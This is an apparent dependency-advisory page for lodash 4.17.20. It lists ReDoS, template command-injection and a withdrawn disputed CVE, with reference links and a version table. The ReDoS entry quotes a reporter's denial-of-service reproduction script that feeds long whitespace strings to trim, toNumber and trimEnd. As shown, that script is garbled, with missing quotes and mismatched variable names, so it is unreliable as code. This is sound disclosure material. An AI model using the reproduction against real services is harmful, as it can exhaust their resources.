NodeJS/lodash/4.17.20
Lodash modular utilities.
https://www.npmjs.com/package/lodash
MIT
3 Security Vulnerabilities
Regular Expression Denial of Service (ReDoS) in lodash
- https://nvd.nist.gov/vuln/detail/CVE-2020-28500
- https://github.com/lodash/lodash/pull/5065
- https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7
- https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8
- https://security.netapp.com/advisory/ntap-20210312-0006/
- https://snyk.io/vuln/SNYK-JS-LODASH-1018905
- https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893
- https://www.oracle.com//security-alerts/cpujul2021.html
- https://www.oracle.com/security-alerts/cpuoct2021.html
- https://github.com/advisories/GHSA-29mw-wpgm-hmr9
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
- https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber
, trim
and trimEnd
functions.
Steps to reproduce (provided by reporter Liyuan Chen): ```js var lo = require('lodash');
function buildblank(n) {
var ret = 1
for (var i = 0; i < n; i++) {
ret += "
}
return ret +
1";
}
var s = buildblank(50000) var time0 = Date.now();
lo.trim(s)
var timecost0 = Date.now() - time0;
console.log("timecost0: + time_cost0);
var time1 = Date.now();
lo.toNumber(s) var time_cost1 = Date.now() - time1;
console.log(
timecost1: " + timecost1);
var time2 = Date.now();
lo.trimEnd(s);
var timecost2 = Date.now() - time2;
console.log("timecost2: " + time_cost2);
```
Command Injection in lodash
- https://nvd.nist.gov/vuln/detail/CVE-2021-23337
- https://github.com/advisories/GHSA-35jh-r3h4-6jhm
- https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
- https://security.netapp.com/advisory/ntap-20210312-0006/
- https://snyk.io/vuln/SNYK-JS-LODASH-1040724
- https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851
- https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js%23L14851
- https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929
- https://www.oracle.com//security-alerts/cpujul2021.html
- https://www.oracle.com/security-alerts/cpuoct2021.html
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
- https://security.netapp.com/advisory/ntap-20210312-0006
lodash
versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Withdrawn: Arbitrary code execution in lodash
Withdrawn
GitHub has chosen to publish this CVE as a withdrawn advisory due to it not being a security issue. See this issue for more details.
CVE description
"** DISPUTED ** A command injection vulnerability in Lodash 4.17.21 allows attackers to achieve arbitrary code execution via the template function. This is a different parameter, method, and version than CVE-2021-23337. NOTE: the vendor's position is that it's the developer's responsibility to ensure that a template does not evaluate code that originates from untrusted input.
114 Other Versions
Version | License | Security | Released | |
---|---|---|---|---|
0.1.0 | MIT | 9 | 2012-04-23 - 16:37 | about 12 years |
0.2.0 | MIT | 9 | 2012-05-22 - 04:06 | almost 12 years |
0.2.1 | MIT | 9 | 2012-05-24 - 21:53 | almost 12 years |
0.2.2 | MIT | 9 | 2012-05-30 - 07:56 | almost 12 years |
0.3.0 | MIT | 9 | 2012-06-06 - 20:01 | almost 12 years |
0.3.1 | MIT | 9 | 2012-06-11 - 04:12 | almost 12 years |
0.3.2 | MIT | 9 | 2012-06-14 - 19:19 | almost 12 years |
0.4.0 | MIT | 9 | 2012-07-11 - 17:14 | almost 12 years |
0.4.1 | MIT | 9 | 2012-07-12 - 04:56 | almost 12 years |
0.4.2 | MIT | 9 | 2012-07-16 - 18:49 | almost 12 years |
0.5.0-rc.1 | MIT | 9 | 2012-08-07 - 15:08 | almost 12 years |
0.5.0 | MIT | 9 | 2012-08-17 - 20:13 | over 11 years |
0.5.1 | MIT | 9 | 2012-08-18 - 20:15 | over 11 years |
0.5.2 | MIT | 9 | 2012-08-22 - 16:22 | over 11 years |
0.6.0 | MIT | 9 | 2012-08-28 - 16:01 | over 11 years |
0.6.1 | MIT | 9 | 2012-08-30 - 08:01 | over 11 years |
0.7.0 | MIT | 9 | 2012-09-11 - 16:24 | over 11 years |
0.8.0 | MIT | 9 | 2012-10-02 - 06:49 | over 11 years |
0.8.1 | MIT | 9 | 2012-10-04 - 08:53 | over 11 years |
0.8.2 | MIT | 9 | 2012-10-10 - 07:51 | over 11 years |
0.9.0 | MIT | 9 | 2013-08-31 - 04:46 | over 10 years |
0.9.1 | MIT | 9 | 2013-08-31 - 04:49 | over 10 years |
0.9.2 | MIT | 9 | 2013-08-31 - 04:52 | over 10 years |
0.10.0 | MIT | 9 | 2013-08-31 - 04:56 | over 10 years |
1.0.0-rc.1 | MIT | 9 | 2013-08-31 - 05:00 | over 10 years |
1.0.0-rc.2 | MIT | 9 | 2013-08-31 - 05:05 | over 10 years |
1.0.0-rc.3 | MIT | 9 | 2013-08-31 - 05:08 | over 10 years |
1.0.0 | MIT | 9 | 2013-08-31 - 05:11 | over 10 years |
1.0.1 | MIT | 9 | 2013-08-31 - 05:16 | over 10 years |
1.1.0 | MIT | 9 | 2013-09-04 - 14:23 | over 10 years |
1.1.1 | MIT | 9 | 2013-09-04 - 14:24 | over 10 years |
1.2.0 | MIT | 9 | 2013-09-04 - 14:24 | over 10 years |
1.2.1 | MIT | 9 | 2013-09-04 - 14:24 | over 10 years |
1.3.0 | MIT | 9 | 2013-09-04 - 14:25 | over 10 years |
1.3.1 | MIT | 9 | 2013-09-04 - 14:25 | over 10 years |
2.0.0 | MIT | 9 | 2013-09-14 - 04:22 | over 10 years |
2.1.0 | MIT | 9 | 2013-09-23 - 05:57 | over 10 years |
2.2.0 | MIT | 9 | 2013-09-29 - 21:52 | over 10 years |
2.2.1 | MIT | 9 | 2013-10-03 - 18:29 | over 10 years |
2.3.0 | MIT | 9 | 2013-11-11 - 17:30 | over 10 years |
2.4.0 | MIT | 9 | 2013-11-26 - 19:40 | over 10 years |
2.4.1 | MIT | 9 | 2013-12-03 - 16:51 | over 10 years |
3.0.0 | MIT | 9 | 2015-01-26 - 15:09 | over 9 years |
3.0.1 | MIT | 9 | 2015-01-30 - 09:33 | over 9 years |
3.1.0 | MIT | 9 | 2015-02-03 - 16:53 | over 9 years |
3.2.0 | MIT | 9 | 2015-02-12 - 17:01 | over 9 years |
3.3.0 | MIT | 9 | 2015-02-20 - 17:08 | about 9 years |
3.3.1 | MIT | 9 | 2015-02-24 - 16:02 | about 9 years |
3.4.0 | MIT | 9 | 2015-03-06 - 16:44 | about 9 years |
3.5.0 | MIT | 9 | 2015-03-09 - 05:01 | about 9 years |
3.6.0 | MIT | 9 | 2015-03-25 - 15:36 | about 9 years |
1.0.2 | MIT | 9 | 2015-03-30 - 15:58 | about 9 years |
3.7.0 | MIT | 10 | 2015-04-16 - 15:47 | about 9 years |
2.4.2 | MIT | 9 | 2015-04-26 - 21:04 | about 9 years |
3.8.0 | MIT | 10 | 2015-05-01 - 15:45 | about 9 years |
3.9.0 | MIT | 10 | 2015-05-19 - 18:26 | almost 9 years |
3.9.1 | MIT | 10 | 2015-05-19 - 21:00 | almost 9 years |
3.9.2 | MIT | 10 | 2015-05-24 - 20:57 | almost 9 years |
3.9.3 | MIT | 10 | 2015-05-26 - 01:47 | almost 9 years |
3.10.0 | MIT | 10 | 2015-06-30 - 15:13 | almost 9 years |
3.10.1 | MIT | 10 | 2015-08-04 - 06:05 | almost 9 years |
4.0.0 | MIT | 10 | 2016-01-12 - 23:13 | over 8 years |
4.0.1 | MIT | 10 | 2016-01-25 - 16:06 | over 8 years |
4.1.0 | MIT | 10 | 2016-01-29 - 16:33 | over 8 years |
4.2.0 | MIT | 10 | 2016-02-02 - 08:50 | over 8 years |
4.2.1 | MIT | 10 | 2016-02-03 - 16:00 | over 8 years |
4.3.0 | MIT | 10 | 2016-02-08 - 08:57 | over 8 years |
4.4.0 | MIT | 10 | 2016-02-16 - 07:10 | about 8 years |
4.5.0 | MIT | 10 | 2016-02-17 - 08:39 | about 8 years |
4.5.1 | MIT | 10 | 2016-02-22 - 06:42 | about 8 years |
4.6.0 | MIT | 10 | 2016-03-02 - 03:24 | about 8 years |
4.6.1 | MIT | 10 | 2016-03-02 - 18:09 | about 8 years |
4.7.0 | MIT | 10 | 2016-03-31 - 15:46 | about 8 years |
4.8.0 | MIT | 10 | 2016-04-04 - 14:54 | about 8 years |
4.8.1 | MIT | 10 | 2016-04-04 - 15:43 | about 8 years |
4.8.2 | MIT | 10 | 2016-04-05 - 02:15 | about 8 years |
4.9.0 | MIT | 10 | 2016-04-08 - 15:22 | about 8 years |
4.10.0 | MIT | 10 | 2016-04-11 - 14:43 | about 8 years |
4.11.0 | MIT | 10 | 2016-04-13 - 15:32 | about 8 years |
4.11.1 | MIT | 10 | 2016-04-14 - 07:21 | about 8 years |
4.11.2 | MIT | 10 | 2016-05-02 - 15:01 | about 8 years |
4.12.0 | MIT | 10 | 2016-05-08 - 19:25 | about 8 years |
4.13.0 | MIT | 10 | 2016-05-23 - 05:07 | almost 8 years |
4.13.1 | MIT | 10 | 2016-05-23 - 15:59 | almost 8 years |
4.14.0 | MIT | 10 | 2016-07-24 - 18:40 | almost 8 years |
4.14.1 | MIT | 10 | 2016-07-29 - 14:49 | almost 8 years |
4.14.2 | MIT | 10 | 2016-08-08 - 15:35 | almost 8 years |
4.15.0 | MIT | 10 | 2016-08-12 - 14:39 | almost 8 years |
4.16.0 | MIT | 10 | 2016-09-19 - 14:59 | over 7 years |
4.16.1 | MIT | 10 | 2016-09-20 - 16:59 | over 7 years |
4.16.2 | MIT | 10 | 2016-09-26 - 03:11 | over 7 years |
4.16.3 | MIT | 10 | 2016-10-03 - 16:43 | over 7 years |
4.16.4 | MIT | 10 | 2016-10-06 - 15:13 | over 7 years |
4.16.5 | MIT | 10 | 2016-10-31 - 06:49 | over 7 years |
4.16.6 | MIT | 10 | 2016-11-01 - 06:38 | over 7 years |
4.17.0 | MIT | 10 | 2016-11-14 - 07:00 | over 7 years |
4.17.1 | MIT | 10 | 2016-11-15 - 07:03 | over 7 years |
4.17.2 | MIT | 10 | 2016-11-16 - 07:21 | over 7 years |
4.17.3 | MIT | 10 | 2016-12-24 - 14:25 | over 7 years |
4.17.4 | MIT | 10 | 2016-12-31 - 22:33 | over 7 years |